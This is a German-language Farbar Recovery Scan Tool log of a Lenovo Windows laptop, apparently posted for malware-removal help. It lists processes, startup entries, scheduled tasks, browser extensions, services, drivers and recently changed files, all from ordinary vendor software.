(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.20092.10311.0_x64__8wekyb3d8bbwe\Music.UI.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe <6>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] (Fortemedia Inc -> )
HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [602968 2015-12-07] (Conexant Systems, Inc. -> Conexant Systems, Inc.)
HKLM\...\Run: [LenovoUtility] => C:\ProgramData\Lenovo\ImController\Plugins\IdeaOSDPackage\x64\utility.exe [911272 2017-07-27] (LENOVO -> Lenovo(beijing) Limited)
HKLM\...\Run: [DAX2_APP] => C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe [849920 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.)
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1831768 2016-08-29] (Conexant Systems, Inc. -> Conexant Systems, Inc.)
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [30870200 2020-09-22] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\MountPoints2: {fd598295-7b76-11ea-8439-701ce7a3076d} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Ribbons.scr [151552 2019-03-19] (Microsoft Windows -> Microsoft Corporation)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {167A0BEA-F118-42E8-A5CC-9F5F30956F4F} - System32\Tasks\Lenovo\BatteryGauge\BatteryGaugeMaintenance => C:\ProgramData\Lenovo\ImController\Plugins\LenovoBatteryGaugePackage\x64\BGHelper.exe [144312 2020-09-15] (Lenovo -> Lenovo Group Ltd.)
Task: {21CA7249-953D-45FA-9C91-A0B0016999C9} - System32\Tasks\Lenovo\Vantage\Lenovo.Vantage.ServiceMaintainance => %systemroot%\system32\sc.exe start LenovoVantageService
Task: {21F9DD1D-1DE5-4822-90C2-CB7C654899D7} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {320778BF-7987-4DD3-BFED-B10FF013247E} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => %windir%\System32\reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32
Task: {3230C1BD-BA01-4E59-B5E6-6C160EE6B11C} - System32\Tasks\Nvbackend_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-06-14] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {3397E752-9B10-4AE9-843D-1C178B28AAD8} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {3B0252EF-8134-4EF7-AED9-28A8041A3BBC} - System32\Tasks\Connect => C:\Program Files (x86)\MAGIX\Connect\connect.exe [324680 2017-05-10] (MAGIX Software GmbH -> MAGIX Software GmbH)
Task: {3FE2E0CA-CA18-480B-AA84-51DA06B6469A} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\36fe37e6-69bf-4240-8789-54e3f941e0f1 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
Task: {4775AA5F-BC1B-4C04-B929-E339FEDF1CCF} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\76e81757-1352-4665-9649-fd3e6e13bd1d => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
Task: {9344E174-DE26-45AF-8C1C-20637B153BDC} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [25492152 2020-09-22] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {9EEC7ADA-6DF3-48EE-B137-41E34B3C6229} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\db1c6fd4-22d9-417d-947b-00e874fdc31c => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
Task: {B465A685-368C-4D1D-A64A-34A6EEB78909} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [686384 2020-09-22] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {CECFD8CF-79F5-44F0-96C1-76B4AD73EE04} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_29_0_0_113_Plugin.exe [1362432 2018-04-07] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {DD4E7C7D-4A28-45FA-BF76-53E3C0448E4F} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => "%windir%\system32\sc.exe" START ImControllerService
Task: {E00BFAE8-C86E-4E1F-8C3C-A8E76C6723A9} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\b00c5975-d513-4b20-a54f-10c9a66bf2ef => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
Task: {FBC58171-479E-4F18-B3A6-88178F164A0C} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Monitor => C:\WINDOWS\system32\ImController.InfInstaller.exe [62280 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\Connect.job => C:\Program Files (x86)\MAGIX\Connect\connect.exe
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{112decd3-61a3-4284-958c-e74aba2b288c}: [DhcpNameServer] 150.213.1.3
Tcpip\..\Interfaces\{d2c88b56-7aab-4dfc-b51d-99c7ec608a32}: [DhcpNameServer] 192.168.1.1
Edge:
======
DownloadDir: C:\Users\seife\Downloads
Edge Profile: C:\Users\seife\AppData\Local\Microsoft\Edge\User Data\Default [2020-11-28]
FireFox:
========
FF DefaultProfile: 9ymm54tg.default
FF ProfilePath: C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default [2020-11-28]
FF Homepage: Mozilla\Firefox\Profiles\9ymm54tg.default -> www.google.com/
FF Notifications: Mozilla\Firefox\Profiles\9ymm54tg.default -> hxxps://book.lufthansa.com; hxxps://web.whatsapp.com; hxxps://iceportal.de
FF Extension: (Shoop Cashback-Assistent: Cashback&Gutscheine) - C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\lisa@qipu.de.xpi [2020-11-26]
FF Extension: (PAYBACK Internet Assistent) - C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\Extensions\toolbar-ff@payback.de-sh.xpi [2020-11-14] [UpdateUrl:hxxps://www.payback.de/resources/content/site-pia/update/1/ffsh/json]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_29_0_0_113.dll [2018-04-07] (Adobe Systems Incorporated -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_29_0_0_113.dll [2018-04-07] (Adobe Systems Incorporated -> )
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-06-19] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Datei ist nicht signiert]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-06-19] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Datei ist nicht signiert]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-11-19] (Adobe Inc. -> Adobe Systems Inc.)
Chrome:
=======
CHR Profile: C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default [2020-11-28]
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxps://www.bing.com/?PC=JV01"
CHR DefaultSearchURL: Default -> hxxps://www.bing.com/search?FORM=JVSBRD&PC=JV02&q={searchTerms}
CHR DefaultSearchKeyword: Default -> bing.com
CHR DefaultSuggestURL: Default -> hxxps://www.bing.com/osjson.aspx?query={searchTerms}
CHR Extension: (Präsentationen) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-04-21]
CHR Extension: (Docs) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-04-21]
CHR Extension: (Google Drive) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-06-11]
CHR Extension: (YouTube) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-06-11]
CHR Extension: (Tabellen) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-04-21]
CHR Extension: (Avira Browserschutz) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2019-04-21]
CHR Extension: (Google Docs Offline) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-04-21]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-04-21]
CHR Extension: (Google Mail) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-06-11]
CHR Extension: (Chrome Media Router) - C:\Users\seife\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-04-21]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]
==================== Dienste (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
R2 CCSDK; C:\Program Files (x86)\Lenovo\CCSDK\CCSDK.exe [666608 2016-03-22] (LENOVO -> Lenovo)
R2 CxUtilSvc; C:\Program Files\Conexant\SAII\CxUtilSvc.exe [132096 2016-05-12] (Conexant Systems, Inc.) [Datei ist nicht signiert]
R2 Dolby DAX2 API Service; C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe [194048 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.)
R2 GDCAgent; C:\Program Files (x86)\Lenovo\GDCAgentSetupRed\GDCAgent.exe [1210352 2016-03-22] (LENOVO -> Lenovo)
R2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [190784 2019-08-19] (Huawei Technologies Co., Ltd. -> ) [Datei ist nicht signiert]
R2 ImControllerService; C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81744 2020-09-24] (Lenovo -> Lenovo Group Ltd.)
R2 LenovoVantageService; C:\Program Files (x86)\Lenovo\VantageService\3.3.115.0\LenovoVantageService.exe [18360 2020-07-09] (Lenovo -> Lenovo Group Ltd.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7269976 2020-11-26] (Malwarebytes Inc -> Malwarebytes)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [4098056 2019-03-19] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [113992 2019-03-19] (Microsoft Corporation -> Microsoft Corporation)
===================== Treiber (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [153312 2020-11-26] (Malwarebytes Corporation -> Malwarebytes)
S3 ew_usbccgpfilter; C:\WINDOWS\System32\drivers\ew_usbccgpfilter.sys [18944 2019-08-19] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [220160 2020-11-26] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [19912 2020-11-26] (Microsoft Windows Early Launch Anti-Malware Publisher -> Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\System32\DRIVERS\farflt.sys [197792 2020-11-28] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\DRIVERS\mbam.sys [77496 2020-11-28] (Malwarebytes Inc -> Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248968 2020-11-26] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\DRIVERS\mwac.sys [138904 2020-11-28] (Malwarebytes Inc -> Malwarebytes)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [46472 2019-03-19] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [333784 2019-03-19] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [62432 2019-03-19] (Microsoft Windows -> Microsoft Corporation)
S3 wsvd; C:\WINDOWS\system32\DRIVERS\wsvd.sys [102376 2012-06-13] (CyberLink -> "CyberLink)
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2020-11-28 14:56 - 2020-11-28 14:57 - 000020246 _____ C:\Users\seife\Desktop\FRST.txt
2020-11-28 14:40 - 2020-11-28 14:56 - 000008638 _____ C:\Users\seife\Desktop\Search.txt
2020-11-28 14:38 - 2020-11-28 14:38 - 000197792 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2020-11-28 14:38 - 2020-11-28 14:38 - 000138904 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2020-11-28 14:38 - 2020-11-28 14:38 - 000077496 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2020-11-28 14:37 - 2020-11-28 14:37 - 000009781 _____ C:\Users\seife\Desktop\Fixlog.txt
2020-11-28 14:34 - 2020-11-28 14:34 - 000000187 _____ C:\Users\seife\Desktop\app.txt
2020-11-28 13:16 - 2020-11-28 14:57 - 000000000 ____D C:\FRST
2020-11-28 13:15 - 2020-11-28 13:15 - 002290176 _____ (Farbar) C:\Users\seife\Desktop\FRST64.exe
2020-11-28 13:04 - 2020-11-28 13:04 - 000000080 ___SH C:\bootTel.dat
2020-11-28 12:35 - 2020-11-28 12:47 - 000000000 ____D C:\Users\seife\Doctor Web
2020-11-28 12:35 - 2020-11-28 12:35 - 000000000 ____D C:\ProgramData\Doctor Web
2020-11-28 12:32 - 2020-11-28 12:34 - 234730072 _____ C:\Users\seife\Downloads\6dqs0oee.exe
2020-11-26 17:29 - 2020-11-26 17:29 - 000248968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2020-11-26 17:29 - 2020-11-26 17:29 - 000220160 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys
2020-11-26 17:29 - 2020-11-26 17:29 - 000153312 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2020-11-26 17:29 - 2020-11-26 17:29 - 000019912 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2020-11-26 17:29 - 2020-11-26 17:29 - 000002040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2020-11-26 17:29 - 2020-11-26 17:29 - 000002028 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2020-11-26 17:29 - 2020-11-26 17:29 - 000002028 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2020-11-26 17:29 - 2020-11-26 17:29 - 000000000 ____D C:\Users\seife\AppData\Local\mbam
2020-11-26 17:29 - 2020-11-26 17:29 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-11-26 17:28 - 2020-11-26 17:28 - 000000000 ____D C:\Program Files\Malwarebytes
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth9.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth8.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth7.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth6.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth5.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth4.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth3.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth2.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth12.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth11.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth10.bin
2020-11-22 11:18 - 2020-11-22 11:18 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth1.bin
2020-11-22 11:17 - 2020-11-22 11:17 - 001841152 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2020-11-22 11:17 - 2020-11-22 11:17 - 001101312 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2020-11-22 11:16 - 2020-11-22 11:16 - 000200704 _____ C:\WINDOWS\system32\IHDS.dll
2020-11-22 11:16 - 2020-11-22 11:16 - 000164864 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2020-11-18 10:57 - 2020-10-06 01:13 - 000835472 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2020-11-18 10:57 - 2020-10-06 01:13 - 000179608 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2020-11-14 17:28 - 2020-11-27 17:29 - 000055296 _____ C:\Users\seife\AppData\Roaming\cookies.sqlite
2020-11-14 16:50 - 2020-11-14 17:39 - 000000000 ____D C:\Users\seife\AppData\Roaming\.minecraft
==================== Ein Monat (geänderte) ==================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2020-11-28 14:46 - 2019-10-27 13:52 - 001723292 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-11-28 14:46 - 2019-03-19 13:16 - 000745142 _____ C:\WINDOWS\system32\perfh007.dat
2020-11-28 14:46 - 2019-03-19 13:16 - 000150430 _____ C:\WINDOWS\system32\perfc007.dat
2020-11-28 14:46 - 2019-03-19 05:50 - 000000000 ____D C:\WINDOWS\INF
2020-11-28 14:40 - 2019-02-03 08:57 - 000000000 ____D C:\ProgramData\Mozilla
2020-11-28 14:39 - 2017-02-25 16:39 - 000000000 ____D C:\Users\seife\AppData\LocalLow\Mozilla
2020-11-28 14:39 - 2017-02-25 15:17 - 000000000 ___RD C:\Users\seife\OneDrive
2020-11-28 14:38 - 2019-10-27 13:53 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-11-28 14:38 - 2019-03-19 05:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-11-28 14:38 - 2019-03-19 05:37 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2020-11-28 14:38 - 2017-02-25 15:15 - 000000000 __SHD C:\Users\seife\IntelGraphicsProfiles
2020-11-28 14:38 - 2017-01-25 11:30 - 000000000 ____D C:\ProgramData\NVIDIA
2020-11-28 14:37 - 2017-04-06 21:18 - 000000000 ____D C:\Users\seife\AppData\LocalLow\Temp
2020-11-28 14:29 - 2019-10-27 13:53 - 000000000 ____D C:\WINDOWS\system32\Tasks\CyberLink
2020-11-28 14:29 - 2017-02-25 15:30 - 000000000 ____D C:\Users\seife\AppData\Local\CyberLink
2020-11-28 14:29 - 2017-01-25 11:20 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo
2020-11-28 14:29 - 2017-01-25 11:20 - 000000000 ____D C:\ProgramData\CyberLink
2020-11-28 14:29 - 2017-01-25 11:19 - 000000000 ____D C:\ProgramData\Temp
2020-11-28 14:29 - 2017-01-25 11:19 - 000000000 ____D C:\ProgramData\SUPPORTDIR
2020-11-28 14:29 - 2017-01-25 11:18 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2020-11-28 14:29 - 2017-01-25 11:18 - 000000000 ____D C:\Program Files (x86)\Lenovo
2020-11-28 14:01 - 2019-10-27 13:41 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-11-28 13:00 - 2019-10-27 13:46 - 000000000 ____D C:\Users\seife
2020-11-28 12:57 - 2019-10-27 13:41 - 000595096 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-11-28 12:48 - 2017-02-26 13:06 - 000000000 ____D C:\Program Files (x86)\Google
2020-11-28 12:29 - 2017-01-25 11:20 - 000000000 ____D C:\ProgramData\Package Cache
2020-11-27 17:26 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-11-27 17:24 - 2017-03-19 13:58 - 000000000 ____D C:\Users\seife\AppData\Local\CrashDumps
2020-11-26 20:06 - 2019-10-27 13:53 - 000004210 _____ C:\WINDOWS\system32\Tasks\CCleaner Update
2020-11-26 20:03 - 2020-10-17 10:12 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2020-11-26 20:02 - 2017-02-25 16:38 - 000001239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-11-26 20:02 - 2017-02-25 16:38 - 000001227 _____ C:\Users\Public\Desktop\Firefox.lnk
2020-11-26 20:02 - 2017-02-25 16:38 - 000001227 _____ C:\ProgramData\Desktop\Firefox.lnk
2020-11-26 18:44 - 2019-03-19 05:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-11-26 18:18 - 2020-09-24 08:24 - 000002443 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-11-26 18:18 - 2020-09-24 08:24 - 000002281 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-11-26 18:18 - 2020-09-24 08:24 - 000002281 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk
2020-11-26 17:30 - 2019-10-27 13:53 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-11-26 17:30 - 2017-02-26 13:06 - 000002143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-11-26 17:29 - 2019-03-19 05:52 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-11-26 17:22 - 2018-12-16 01:08 - 000000000 ____D C:\Users\seife\AppData\Local\D3DSCache
2020-11-26 17:15 - 2017-04-06 20:47 - 000000000 ___RD C:\Users\seife\3D Objects
2020-11-26 17:15 - 2016-07-29 18:27 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\TextInput
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\SystemResources
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\setup
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\oobe
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\ShellExperiences
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2020-11-22 12:12 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-11-22 11:32 - 2017-08-04 23:14 - 000000000 ____D C:\Users\seife\AppData\Local\ElevatedDiagnostics
2020-11-22 11:22 - 2020-10-17 10:36 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-11-22 11:22 - 2019-03-19 05:37 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-11-22 11:16 - 2019-10-27 13:44 - 002876928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ___RD C:\WINDOWS\PrintDialog
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2020-11-18 09:21 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\system32\Sysprep
